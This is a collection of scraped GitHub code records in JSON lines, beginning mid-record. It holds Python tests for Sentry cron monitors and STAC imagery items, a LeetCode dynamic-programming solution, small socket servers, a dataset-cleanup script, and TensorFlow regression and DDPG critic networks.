None,\n \"historic_survey_number\": None,\n }\n ulid = \"fake_ulid\"\n collection = ImageryCollection(title_metadata=metadata, collection_id=ulid)\n\n path = \"./test/BR34_5000_0302.tiff\"\n id_ = get_file_name_from_path(path)\n checksum = \"1220cdef68d62fb912110b810e62edc53de07f7a44fb2b310db700e9d9dd58baa6b4\"\n mocker.patch(\"scripts.stac.util.checksum.multihash_as_hex\", return_value=checksum)\n item = ImageryItem(id_, path)\n\n item.add_collection(collection.stac[\"id\"])\n\n assert item.stac[\"collection\"] == ulid\n assert {\"rel\": \"collection\", \"href\": \"./collection.json\", \"type\": \"application/json\"} in item.stac[\"links\"]\n assert {\"rel\": \"parent\", \"href\": \"./collection.json\", \"type\": \"application/json\"} in item.stac[\"links\"]\n","repo_name":"linz/topo-imagery","sub_path":"scripts/stac/tests/item_test.py","file_name":"item_test.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"92"} +{"seq_id":"41560413708","text":"class Solution:\n def print_DP(self,DP):\n for row in DP:\n print(row)\n print(\"--------------------------\")\n \n def longestPalindromeSubseq(self, s: str) -> int:\n '''\n a i==j DP[i][j] = 1\n a*****a s[i]==s[j] DP[i][j] = DP[i+1][j-1] + 2\n a*****b s[i] != s[j] DP[i][j] = max(DP[i+1][j] , DP[i][j-1])\n '''\n n = len(s)\n DP = []\n for r in range(n):\n row = [0]*n\n DP.append(row)\n\n # l = len(substr)\n for l in range(n):\n for i in range(n-l):\n j = i+l\n if(i == j):\n DP[i][j] = 1\n continue\n if(s[i] == s[j]):\n DP[i][j] = DP[i+1][j-1] + 2\n else:\n DP[i][j] = max(DP[i+1][j],DP[i][j-1])\n self.print_DP(DP)\n \n return DP[0][n-1]\n\n\n\n\n\ns = \"bbbab\" \nsol = Solution()\nprint(sol.longestPalindromeSubseq(s))\n","repo_name":"TheozZeng/Leetcode","sub_path":"Q_by_Topic/DP/516. Longest Palindromic Subsequence.py","file_name":"516. Longest Palindromic Subsequence.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40085787888","text":"# Nathan Glikman\n# Project 1\n# ts.py\n\nimport socket as mysoc\n\n# Set up server socket\n\ntry:\n\tts = mysoc.socket(mysoc.AF_INET, mysoc.SOCK_STREAM)\n\tprint(\"TS server created successfully\")\nexcept mysoc.error as err:\n\tprint('{} \\n'.format(\"Error creating TS socket\", err))\n\n# Bind RS server to port 69696 and enable listening\nserver_binding = ('', 69696)\nts.bind(server_binding)\nts.listen(1)\n\n# Wait for client to connect\nclientid, addr = ts.accept()\n","repo_name":"nster98/InternetTechnologySp20","sub_path":"project1/ts.py","file_name":"ts.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40546375073","text":"from __future__ import annotations\n\nfrom datetime import datetime, timedelta\nfrom unittest.mock import patch\n\nfrom django.conf import settings\nfrom django.test.utils import override_settings\n\nfrom sentry.api.fields.sentry_slug import DEFAULT_SLUG_ERROR_MESSAGE\nfrom sentry.constants import ObjectStatus\nfrom sentry.models.rule import Rule, RuleSource\nfrom sentry.monitors.models import Monitor, MonitorStatus, MonitorType, ScheduleType\nfrom sentry.testutils.cases import MonitorTestCase\nfrom sentry.testutils.silo import region_silo_test\nfrom sentry.utils.outcomes import Outcome\n\n\n@region_silo_test\nclass ListOrganizationMonitorsTest(MonitorTestCase):\n endpoint = \"sentry-api-0-organization-monitor-index\"\n\n def setUp(self):\n super().setUp()\n self.login_as(self.user)\n\n def check_valid_response(self, response, expected_monitors):\n assert [monitor.slug for monitor in expected_monitors] == [\n monitor_resp[\"slug\"] for monitor_resp in response.data\n ]\n\n def check_valid_environments_response(self, response, monitor, expected_environments):\n assert {\n monitor_environment.environment.name for monitor_environment in expected_environments\n } == {\n monitor_environment_resp[\"name\"]\n for monitor_environment_resp in monitor.get(\"environments\", [])\n }\n\n def test_simple(self):\n monitor = self._create_monitor()\n response = self.get_success_response(self.organization.slug)\n self.check_valid_response(response, [monitor])\n\n def test_sort(self):\n last_checkin = datetime.now() - timedelta(minutes=1)\n last_checkin_older = datetime.now() - timedelta(minutes=5)\n\n def add_status_monitor(status_key: str, date: datetime | None = None):\n monitor_status = getattr(MonitorStatus, status_key)\n # TODO(rjo100): this is precursor to removing the MonitorStatus values from Monitors\n monitor = self._create_monitor(\n status=ObjectStatus.ACTIVE,\n name=status_key,\n )\n self._create_monitor_environment(\n monitor,\n name=\"jungle\",\n last_checkin=(date or last_checkin) - timedelta(seconds=30),\n status=monitor_status,\n )\n self._create_monitor_environment(\n monitor,\n name=\"volcano\",\n last_checkin=(date or last_checkin) - timedelta(seconds=15),\n status=MonitorStatus.DISABLED,\n )\n return monitor\n\n # Subsort next checkin time\n monitor_active = add_status_monitor(\"ACTIVE\")\n monitor_ok = add_status_monitor(\"OK\")\n monitor_disabled = add_status_monitor(\"DISABLED\")\n monitor_error_older_checkin = add_status_monitor(\"ERROR\", last_checkin_older)\n monitor_error = add_status_monitor(\"ERROR\")\n monitor_missed_checkin = add_status_monitor(\"MISSED_CHECKIN\")\n monitor_timed_out = add_status_monitor(\"TIMEOUT\")\n\n response = self.get_success_response(\n self.organization.slug, params={\"environment\": \"jungle\"}\n )\n self.check_valid_response(\n response,\n [\n monitor_error,\n monitor_error_older_checkin,\n monitor_timed_out,\n monitor_missed_checkin,\n monitor_ok,\n monitor_active,\n monitor_disabled,\n ],\n )\n\n def test_all_monitor_environments(self):\n monitor = self._create_monitor()\n monitor_environment = self._create_monitor_environment(\n monitor, name=\"test\", status=MonitorStatus.OK\n )\n\n monitor_empty = self._create_monitor(name=\"empty\")\n\n response = self.get_success_response(self.organization.slug)\n self.check_valid_response(response, [monitor, monitor_empty])\n self.check_valid_environments_response(response, response.data[0], [monitor_environment])\n self.check_valid_environments_response(response, response.data[1], [])\n\n def test_monitor_environment(self):\n monitor = self._create_monitor()\n self._create_monitor_environment(monitor)\n\n monitor_hidden = self._create_monitor(name=\"hidden\")\n self._create_monitor_environment(monitor_hidden, name=\"hidden\")\n\n response = self.get_success_response(self.organization.slug, environment=\"production\")\n self.check_valid_response(response, [monitor])\n\n def test_monitor_environment_include_new(self):\n monitor = self._create_monitor()\n self._create_monitor_environment(\n monitor, status=MonitorStatus.OK, last_checkin=datetime.now() - timedelta(minutes=1)\n )\n\n monitor_visible = self._create_monitor(name=\"visible\")\n\n response = self.get_success_response(\n self.organization.slug, environment=\"production\", includeNew=True\n )\n self.check_valid_response(response, [monitor, monitor_visible])\n\n def test_search_by_slug(self):\n monitor = self._create_monitor(slug=\"test-slug\")\n self._create_monitor(slug=\"other-monitor\")\n\n response = self.get_success_response(self.organization.slug, query=\"test-slug\")\n self.check_valid_response(response, [monitor])\n\n def test_ignore_pending_deletion_environments(self):\n monitor = self._create_monitor()\n self._create_monitor_environment(\n monitor,\n status=MonitorStatus.OK,\n last_checkin=datetime.now() - timedelta(minutes=1),\n )\n self._create_monitor_environment(\n monitor,\n status=MonitorStatus.PENDING_DELETION,\n name=\"deleted_environment\",\n last_checkin=datetime.now() - timedelta(minutes=1),\n )\n\n response = self.get_success_response(self.organization.slug)\n self.check_valid_response(response, [monitor])\n # Confirm we only see the one 'ok' environment\n assert len(response.data[0][\"environments\"]) == 1\n assert response.data[0][\"environments\"][0][\"status\"] == \"ok\"\n\n\n@region_silo_test\nclass CreateOrganizationMonitorTest(MonitorTestCase):\n endpoint = \"sentry-api-0-organization-monitor-index\"\n method = \"post\"\n\n def setUp(self):\n super().setUp()\n self.login_as(self.user)\n\n @patch(\"sentry.analytics.record\")\n def test_simple(self, mock_record):\n data = {\n \"project\": self.project.slug,\n \"name\": \"My Monitor\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n }\n response = self.get_success_response(self.organization.slug, **data)\n\n monitor = Monitor.objects.get(slug=response.data[\"slug\"])\n assert monitor.organization_id == self.organization.id\n assert monitor.project_id == self.project.id\n assert monitor.name == \"My Monitor\"\n assert monitor.status == ObjectStatus.ACTIVE\n assert monitor.type == MonitorType.CRON_JOB\n assert monitor.config == {\n \"schedule_type\": ScheduleType.CRONTAB,\n \"schedule\": \"0 0 * * *\",\n \"checkin_margin\": None,\n \"max_runtime\": None,\n \"failure_issue_threshold\": None,\n \"recovery_threshold\": None,\n }\n\n self.project.refresh_from_db()\n assert self.project.flags.has_cron_monitors\n\n mock_record.assert_any_call(\n \"cron_monitor.created\",\n user_id=self.user.id,\n organization_id=self.organization.id,\n project_id=self.project.id,\n from_upsert=False,\n )\n mock_record.assert_called_with(\n \"first_cron_monitor.created\",\n user_id=self.user.id,\n organization_id=self.organization.id,\n project_id=self.project.id,\n from_upsert=False,\n )\n\n def test_slug(self):\n data = {\n \"project\": self.project.slug,\n \"name\": \"My Monitor\",\n \"slug\": \"my-monitor\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n }\n response = self.get_success_response(self.organization.slug, **data)\n\n assert response.data[\"slug\"] == \"my-monitor\"\n\n def test_invalid_numeric_slug(self):\n data = {\n \"project\": self.project.slug,\n \"name\": \"My Monitor\",\n \"slug\": \"1234\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n }\n response = self.get_error_response(self.organization.slug, **data, status_code=400)\n assert response.data[\"slug\"][0] == DEFAULT_SLUG_ERROR_MESSAGE\n\n def test_generated_slug_not_entirely_numeric(self):\n data = {\n \"project\": self.project.slug,\n \"name\": \"1234\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n }\n response = self.get_success_response(self.organization.slug, **data, status_code=201)\n\n slug = response.data[\"slug\"]\n assert slug.startswith(\"1234-\")\n assert not slug.isdecimal()\n\n @override_settings(MAX_MONITORS_PER_ORG=2)\n def test_monitor_organization_limit(self):\n for i in range(settings.MAX_MONITORS_PER_ORG):\n data = {\n \"project\": self.project.slug,\n \"name\": f\"Unicron-{i}\",\n \"slug\": f\"unicron-{i}\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n }\n self.get_success_response(self.organization.slug, **data)\n\n data = {\n \"project\": self.project.slug,\n \"name\": f\"Unicron-{settings.MAX_MONITORS_PER_ORG + 1}\",\n \"slug\": f\"unicron-{settings.MAX_MONITORS_PER_ORG + 1}\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n }\n self.get_error_response(self.organization.slug, status_code=403, **data)\n\n def test_simple_with_alert_rule(self):\n data = {\n \"project\": self.project.slug,\n \"name\": \"My Monitor\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n \"alert_rule\": {\n \"environment\": self.environment.name,\n \"targets\": [{\"targetIdentifier\": self.user.id, \"targetType\": \"Member\"}],\n },\n }\n response = self.get_success_response(self.organization.slug, **data)\n\n monitor = Monitor.objects.get(slug=response.data[\"slug\"])\n alert_rule_id = monitor.config.get(\"alert_rule_id\")\n rule = Rule.objects.get(\n project_id=monitor.project_id, id=alert_rule_id, source=RuleSource.CRON_MONITOR\n )\n assert rule is not None\n assert rule.environment_id == self.environment.id\n\n def test_checkin_margin_zero(self):\n # Invalid checkin margin\n #\n # XXX(epurkhiser): We currently transform 0 -> 1 for backwards\n # compatability. If we remove the custom transformer in the config\n # validator this test will chagne to a get_error_response test.\n data = {\n \"project\": self.project.slug,\n \"name\": \"My Monitor\",\n \"slug\": \"cron_job\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\", \"checkin_margin\": 0},\n }\n response = self.get_success_response(self.organization.slug, **data)\n assert Monitor.objects.get(slug=response.data[\"slug\"]).config[\"checkin_margin\"] == 1\n\n @patch(\"sentry.quotas.backend.assign_monitor_seat\")\n def test_create_monitor_assigns_seat(self, assign_monitor_seat):\n assign_monitor_seat.return_value = Outcome.ACCEPTED\n\n data = {\n \"project\": self.project.slug,\n \"name\": \"My Monitor\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n }\n response = self.get_success_response(self.organization.slug, **data)\n\n monitor = Monitor.objects.get(slug=response.data[\"slug\"])\n\n assign_monitor_seat.assert_called_with(monitor)\n assert monitor.status == ObjectStatus.ACTIVE\n\n @patch(\"sentry.quotas.backend.assign_monitor_seat\")\n def test_create_monitor_without_seat(self, assign_monitor_seat):\n assign_monitor_seat.return_value = Outcome.RATE_LIMITED\n\n data = {\n \"project\": self.project.slug,\n \"name\": \"My Monitor\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n }\n response = self.get_success_response(self.organization.slug, **data)\n\n monitor = Monitor.objects.get(slug=response.data[\"slug\"])\n\n assert assign_monitor_seat.called\n assert response.data[\"status\"] == \"disabled\"\n assert monitor.status == ObjectStatus.DISABLED\n","repo_name":"getsentry/sentry","sub_path":"tests/sentry/monitors/endpoints/test_organization_monitor_index.py","file_name":"test_organization_monitor_index.py","file_ext":"py","file_size_in_byte":13063,"program_lang":"python","lang":"en","doc_type":"code","stars":35611,"dataset":"github-code","pt":"92"} +{"seq_id":"74337691181","text":"from helper import USER_ADDR_INFO, END_AUDIO, END_IMAGE, RECEIVED_AUDIO, RECEIVED_IMAGE, DATE_LEN, data_to_file\nfrom routes import APP, update\nimport os\nimport socket\nimport datetime\nimport threading\nimport signal\nimport yaml\nimport plot\n\nDATETIMES: list[datetime.datetime] = []\n\ndef server():\n\t'''\n\tServer code to receive data from the doorbell\n\tincluding a datetime object when the doorbell is pressed,\n\tan image taken at the door and\n\tan audio recording\n\t'''\n\twhile True:\n\t\tconn, _ = server_socket.accept()\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tdate = conn.recv(DATE_LEN)\n\t\t\t\ttry:\n\t\t\t\t\t# Add a datetime object to the database\n\t\t\t\t\tdate = datetime.datetime.strptime(date.decode(), '%Y-%m-%d %w %H:%M:%S')\n\t\t\t\t\tprint(date)\n\t\t\t\t\tDATETIMES.append(date)\n\t\t\t\t\twith open('datetimes.yml', 'w') as file:\n\t\t\t\t\t\tyaml.dump(DATETIMES, file)\n\t\t\t\t\tplot.plot(DATETIMES)\n\t\t\t\t\tconn.send(b'received date')\n\t\t\t\texcept:\n\t\t\t\t\tconn.send(b'invalid date')\n\n\t\t\t\t# Receive the image and audio data and write to files\n\t\t\t\tdata_to_file(conn, 'static/assets/in.jpeg', END_IMAGE, RECEIVED_IMAGE)\n\t\t\t\tdata_to_file(conn, 'static/assets/in.wav', END_AUDIO, RECEIVED_AUDIO)\n\n\t\t\t\t# Set the flag so the frontend can receive an update\n\t\t\t\tupdate()\n\t\t\texcept:\n\t\t\t\tconn.close()\n\t\t\t\tprint('Lost connection with the doorbell')\n\t\t\t\tbreak\n\nif __name__ == '__main__':\n\t# Read in the database which stores all the datetimes when the doorbell was pressed\n\tif not os.path.isfile('datetimes.yml'):\n\t\topen('datetimes.yml', 'w')\n\twith open('datetimes.yml', 'r') as file:\n\t\tDATETIMES = yaml.full_load(file)\n\n\t# Start a server on a different thread to listen for requests from the doorbell\n\tserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ttry:\n\t\tserver_socket.bind(('', USER_ADDR_INFO[1]))\n\t\t# Only allows 1 connection at a time\n\t\tserver_socket.listen(1)\n\t\tthreading.Thread(target=server).start()\n\t\tprint(f'Server is listening on port {USER_ADDR_INFO[1]}')\n\texcept Exception as error:\n\t\tprint(f'Failed to start the server: {error}')\n\t\tserver_socket.close()\n\t\texit(1)\n\n\t# Run the Flask server on a different thread\n\tthreading.Thread(target=lambda: APP.run(use_reloader=False)).start()\n\n\t# Close the socket when Control-C is pressed to end the program\n\tdef handler(*_):\n\t\tserver_socket.close()\n\t\texit(0)\n\n\tsignal.signal(signal.SIGINT, handler)\n","repo_name":"Kaiqi-Liang/CITS5506-Project","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4598974428","text":"import unittest\nfrom saffy import SignalManager\nfrom ..mocks import sine_wave\nimport scipy.signal as ss\nimport numpy as np\n\n\nclass TestWelchPlugin(unittest.TestCase):\n\tdef welch_spectrum_test(self):\n\t\tfreq = 50\n\t\tphase = np.pi/2\n\n\t\tgenerator = sine_wave(freq=freq, phase=phase)\n\t\tsig = SignalManager(generator=generator)\n\n\t\tsig.welch_spectrum()\n\n\t\tfreq, spec = ss.welch(generator['data'], generator['fs'])\n\n\t\tself.assertTrue(np.allclose(sig.spectrum, spec))\n\t\tself.assertTrue(np.allclose(sig.spectrum_freqs, freq))\n\n\tdef welch_mean_spectrum_test(self):\n\t\tfreq = 50\n\t\tphase = np.pi / 2\n\n\t\tdata = {\n\t\t\t'fs': 512,\n\t\t\t'num_channels': 1,\n\t\t\t'channel_names': ['sine'],\n\t\t\t'epochs': 10\n\t\t}\n\n\t\tgenerator = sine_wave(freq=freq, phase=phase, data=data)\n\t\tsig = SignalManager(generator=generator)\n\n\t\tsig.welch_mean_spectrum()\n\n\t\tfreq, spec = ss.welch(generator['data'], generator['fs'])\n\n\t\tmean_spec = np.mean(spec, 0)\n\n\t\tself.assertTrue(np.allclose(sig.spectrum, mean_spec))\n\n\nif __name__ == '__main__':\n\tunittest.main()\n","repo_name":"saffy-team/saffy","sub_path":"tests/plugins/Welch.py","file_name":"Welch.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"20655918066","text":"# 清理一下jpeg和xml不匹配问题\nimport os,shutil\n\njpeg = './sources/images/'\njpeg_list = os.listdir(jpeg)\n\nanno = './sources/Annotation'\nanno_list = os.listdir(anno)\n\n# 清除img\nfor pic in jpeg_list:\n name = pic.split('.')[0]\n anno_name = name + '.xml'\n #print(anno_name)\n if anno_name not in anno_list:\n os.remove(os.path.join(jpeg,pic))","repo_name":"WangRongsheng/KDAT","sub_path":"autoLabel/tools-clear_xml_imges.py","file_name":"tools-clear_xml_imges.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"92"} +{"seq_id":"73649585901","text":"import numpy as np\n\nimport sandbox.rocky.tf.core.layers as L\nfrom sandbox.rocky.tf.core.layers_powered import LayersPowered\nfrom sandbox.rocky.tf.core.network import MLP\nfrom sandbox.rocky.tf.misc import tensor_utils\nfrom sandbox.rocky.tf.optimizers.lbfgs_optimizer import LbfgsOptimizer\nfrom sandbox.rocky.tf.optimizers.penalty_lbfgs_optimizer import PenaltyLbfgsOptimizer\nfrom sandbox.rocky.tf.distributions.diagonal_gaussian import DiagonalGaussian\nfrom rllab.core.serializable import Serializable\nfrom rllab.misc import logger\nimport tensorflow as tf\n\n\nclass GaussianMLPRegressor(LayersPowered, Serializable):\n \"\"\"\n A class for performing regression by fitting a Gaussian distribution to the outputs.\n \"\"\"\n\n def __init__(\n self,\n name,\n input_shape,\n output_dim,\n mean_network=None,\n hidden_sizes=(32, 32),\n hidden_nonlinearity=tf.nn.tanh,\n optimizer=None,\n use_trust_region=True,\n step_size=0.01,\n learn_std=True,\n init_std=1.0,\n adaptive_std=False,\n std_share_network=False,\n std_hidden_sizes=(32, 32),\n std_nonlinearity=None,\n normalize_inputs=True,\n normalize_outputs=True,\n subsample_factor=1.0\n ):\n \"\"\"\n :param input_shape: Shape of the input data.\n :param output_dim: Dimension of output.\n :param hidden_sizes: Number of hidden units of each layer of the mean network.\n :param hidden_nonlinearity: Non-linearity used for each layer of the mean network.\n :param optimizer: Optimizer for minimizing the negative log-likelihood.\n :param use_trust_region: Whether to use trust region constraint.\n :param step_size: KL divergence constraint for each iteration\n :param learn_std: Whether to learn the standard deviations. Only effective if adaptive_std is False. If\n adaptive_std is True, this parameter is ignored, and the weights for the std network are always learned.\n :param adaptive_std: Whether to make the std a function of the states.\n :param std_share_network: Whether to use the same network as the mean.\n :param std_hidden_sizes: Number of hidden units of each layer of the std network. Only used if\n `std_share_network` is False. It defaults to the same architecture as the mean.\n :param std_nonlinearity: Non-linearity used for each layer of the std network. Only used if `std_share_network`\n is False. It defaults to the same non-linearity as the mean.\n \"\"\"\n Serializable.quick_init(self, locals())\n\n with tf.variable_scope(name):\n\n if optimizer is None:\n if use_trust_region:\n optimizer = PenaltyLbfgsOptimizer(\"optimizer\")\n else:\n optimizer = LbfgsOptimizer(\"optimizer\")\n\n self._optimizer = optimizer\n self._subsample_factor = subsample_factor\n\n if mean_network is None:\n mean_network = MLP(\n name=\"mean_network\",\n input_shape=input_shape,\n output_dim=output_dim,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n output_nonlinearity=None,\n )\n\n l_mean = mean_network.output_layer\n\n if adaptive_std:\n l_log_std = MLP(\n name=\"log_std_network\",\n input_shape=input_shape,\n input_var=mean_network.input_layer.input_var,\n output_dim=output_dim,\n hidden_sizes=std_hidden_sizes,\n hidden_nonlinearity=std_nonlinearity,\n output_nonlinearity=None,\n ).output_layer\n else:\n l_log_std = L.ParamLayer(\n mean_network.input_layer,\n num_units=output_dim,\n param=tf.constant_initializer(np.log(init_std)),\n name=\"output_log_std\",\n trainable=learn_std,\n )\n\n LayersPowered.__init__(self, [l_mean, l_log_std])\n\n xs_var = mean_network.input_layer.input_var\n ys_var = tf.placeholder(dtype=tf.float32, name=\"ys\", shape=(None, output_dim))\n old_means_var = tf.placeholder(dtype=tf.float32, name=\"ys\", shape=(None, output_dim))\n old_log_stds_var = tf.placeholder(dtype=tf.float32, name=\"old_log_stds\", shape=(None, output_dim))\n\n x_mean_var = tf.Variable(\n np.zeros((1,) + input_shape, dtype=np.float32),\n name=\"x_mean\",\n )\n x_std_var = tf.Variable(\n np.ones((1,) + input_shape, dtype=np.float32),\n name=\"x_std\",\n )\n y_mean_var = tf.Variable(\n np.zeros((1, output_dim), dtype=np.float32),\n name=\"y_mean\",\n )\n y_std_var = tf.Variable(\n np.ones((1, output_dim), dtype=np.float32),\n name=\"y_std\",\n )\n\n normalized_xs_var = (xs_var - x_mean_var) / x_std_var\n normalized_ys_var = (ys_var - y_mean_var) / y_std_var\n\n normalized_means_var = L.get_output(l_mean, {mean_network.input_layer: normalized_xs_var})\n normalized_log_stds_var = L.get_output(l_log_std, {mean_network.input_layer: normalized_xs_var})\n\n means_var = normalized_means_var * y_std_var + y_mean_var\n log_stds_var = normalized_log_stds_var + tf.log(y_std_var)\n\n normalized_old_means_var = (old_means_var - y_mean_var) / y_std_var\n normalized_old_log_stds_var = old_log_stds_var - tf.log(y_std_var)\n\n dist = self._dist = DiagonalGaussian(output_dim)\n\n normalized_dist_info_vars = dict(mean=normalized_means_var, log_std=normalized_log_stds_var)\n\n mean_kl = tf.reduce_mean(dist.kl_sym(\n dict(mean=normalized_old_means_var, log_std=normalized_old_log_stds_var),\n normalized_dist_info_vars,\n ))\n\n loss = - tf.reduce_mean(dist.log_likelihood_sym(normalized_ys_var, normalized_dist_info_vars))\n\n self._f_predict = tensor_utils.compile_function([xs_var], means_var)\n self._f_pdists = tensor_utils.compile_function([xs_var], [means_var, log_stds_var])\n self._l_mean = l_mean\n self._l_log_std = l_log_std\n\n optimizer_args = dict(\n loss=loss,\n target=self,\n network_outputs=[normalized_means_var, normalized_log_stds_var],\n )\n\n if use_trust_region:\n optimizer_args[\"leq_constraint\"] = (mean_kl, step_size)\n optimizer_args[\"inputs\"] = [xs_var, ys_var, old_means_var, old_log_stds_var]\n else:\n optimizer_args[\"inputs\"] = [xs_var, ys_var]\n\n self._optimizer.update_opt(**optimizer_args)\n\n self._use_trust_region = use_trust_region\n self._name = name\n\n self._normalize_inputs = normalize_inputs\n self._normalize_outputs = normalize_outputs\n self._mean_network = mean_network\n self._x_mean_var = x_mean_var\n self._x_std_var = x_std_var\n self._y_mean_var = y_mean_var\n self._y_std_var = y_std_var\n\n def fit(self, xs, ys):\n if self._subsample_factor < 1:\n num_samples_tot = xs.shape[0]\n idx = np.random.randint(0, num_samples_tot, int(num_samples_tot * self._subsample_factor))\n xs, ys = xs[idx], ys[idx]\n\n sess = tf.get_default_session()\n if self._normalize_inputs:\n # recompute normalizing constants for inputs\n sess.run([\n tf.assign(self._x_mean_var, np.mean(xs, axis=0, keepdims=True)),\n tf.assign(self._x_std_var, np.std(xs, axis=0, keepdims=True) + 1e-8),\n ])\n if self._normalize_outputs:\n # recompute normalizing constants for outputs\n sess.run([\n tf.assign(self._y_mean_var, np.mean(ys, axis=0, keepdims=True)),\n tf.assign(self._y_std_var, np.std(ys, axis=0, keepdims=True) + 1e-8),\n ])\n if self._use_trust_region:\n old_means, old_log_stds = self._f_pdists(xs)\n inputs = [xs, ys, old_means, old_log_stds]\n else:\n inputs = [xs, ys]\n loss_before = self._optimizer.loss(inputs)\n if self._name:\n prefix = self._name + \"_\"\n else:\n prefix = \"\"\n logger.record_tabular(prefix + 'LossBefore', loss_before)\n self._optimizer.optimize(inputs)\n loss_after = self._optimizer.loss(inputs)\n logger.record_tabular(prefix + 'LossAfter', loss_after)\n if self._use_trust_region:\n logger.record_tabular(prefix + 'MeanKL', self._optimizer.constraint_val(inputs))\n logger.record_tabular(prefix + 'dLoss', loss_before - loss_after)\n\n def predict(self, xs):\n \"\"\"\n Return the maximum likelihood estimate of the predicted y.\n :param xs:\n :return:\n \"\"\"\n return self._f_predict(xs)\n\n def sample_predict(self, xs):\n \"\"\"\n Sample one possible output from the prediction distribution.\n :param xs:\n :return:\n \"\"\"\n means, log_stds = self._f_pdists(xs)\n return self._dist.sample(dict(mean=means, log_std=log_stds))\n\n def predict_log_likelihood(self, xs, ys):\n means, log_stds = self._f_pdists(xs)\n return self._dist.log_likelihood(ys, dict(mean=means, log_std=log_stds))\n\n def log_likelihood_sym(self, x_var, y_var):\n normalized_xs_var = (x_var - self._x_mean_var) / self._x_std_var\n\n normalized_means_var, normalized_log_stds_var = \\\n L.get_output([self._l_mean, self._l_log_std], {self._mean_network.input_layer: normalized_xs_var})\n\n means_var = normalized_means_var * self._y_std_var + self._y_mean_var\n log_stds_var = normalized_log_stds_var + TT.log(self._y_std_var)\n\n return self._dist.log_likelihood_sym(y_var, dict(mean=means_var, log_std=log_stds_var))\n\n def get_param_values(self, **tags):\n return LayersPowered.get_param_values(self, **tags)\n\n def set_param_values(self, flattened_params, **tags):\n LayersPowered.set_param_values(self, flattened_params, **tags)\n","repo_name":"rll/rllab","sub_path":"sandbox/rocky/tf/regressors/gaussian_mlp_regressor.py","file_name":"gaussian_mlp_regressor.py","file_ext":"py","file_size_in_byte":10577,"program_lang":"python","lang":"en","doc_type":"code","stars":2825,"dataset":"github-code","pt":"92"} +{"seq_id":"5649645381","text":"import tensorflow as tf\nimport numpy as np\nfrom utils import layer\n\nclass Critic():\n\n def __init__(self, sess, action_space_size, env_space_size, learning_rate=0.001, gamma=0.99, tau=0.001):\n self.sess = sess\n self.learning_rate = learning_rate\n self.gamma = gamma\n self.tau = tau\n self.loss_val = 0\n self.state_ph = tf.placeholder(tf.float32, shape=(None, env_space_size), name='state_ph')\n self.action_ph = tf.placeholder(tf.float32, shape=(None, action_space_size), name='action_ph')\n\n self.features_ph = tf.concat([self.state_ph, self.action_ph], axis=1)\n\n self.infer = self.create_nn(self.features_ph)\n self.weights = [v for v in tf.trainable_variables() if 'critic' in v.op.name]\n\n # Target network code \"repurposed\" from Patrick Emani :^)\n self.target = self.create_nn(self.features_ph, name='critic_target')\n self.target_weights = [v for v in tf.trainable_variables() if 'critic' in v.op.name][len(self.weights):]\n\n self.update_target_weights = \\\n\t [self.target_weights[i].assign(tf.multiply(self.weights[i], self.tau) +\n tf.multiply(self.target_weights[i], 1. - self.tau))\n for i in range(len(self.target_weights))]\n\t\n self.wanted_qs = tf.placeholder(tf.float32, shape=(None, 1))\n\n self.loss = tf.reduce_mean(tf.square(self.wanted_qs - self.infer))\n\n self.train = tf.train.AdamOptimizer(learning_rate).minimize(self.loss)\n\n self.gradient = tf.gradients(self.infer, self.action_ph)\n\n def update(self, old_states, old_actions, rewards, new_states, new_actions, is_terminals):\n wanted_qs = self.sess.run(self.target,\n feed_dict={\n self.state_ph: new_states,\n self.action_ph: new_actions\n })\n \n for i in range(len(wanted_qs)):\n if is_terminals[i]:\n wanted_qs[i] = rewards[i]\n else:\n wanted_qs[i] = rewards[i] + self.gamma * wanted_qs[i][0]\n\n self.loss_val, _ = self.sess.run([self.loss, self.train],\n feed_dict={\n self.state_ph: old_states,\n self.action_ph: old_actions,\n self.wanted_qs: wanted_qs \n })\n\n self.sess.run(self.update_target_weights)\n\n def get_gradients(self, state, action):\n grads = self.sess.run(self.gradient,\n feed_dict={\n self.state_ph: state,\n self.action_ph: action\n })\n\n return grads[0]\n\n def create_nn(self, features, name='critic'):\n with tf.variable_scope(name + '_fc_1'):\n fc1 = layer(features, 400)\n with tf.variable_scope(name + '_fc_2'):\n fc2 = layer(fc1, 300)\n with tf.variable_scope(name + '_fc_3'):\n fc3 = layer(fc2, 1, is_output=True)\n\n return fc3\n","repo_name":"mluogh/reinforcement","sub_path":"ddpg/critic.py","file_name":"critic.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"92"} 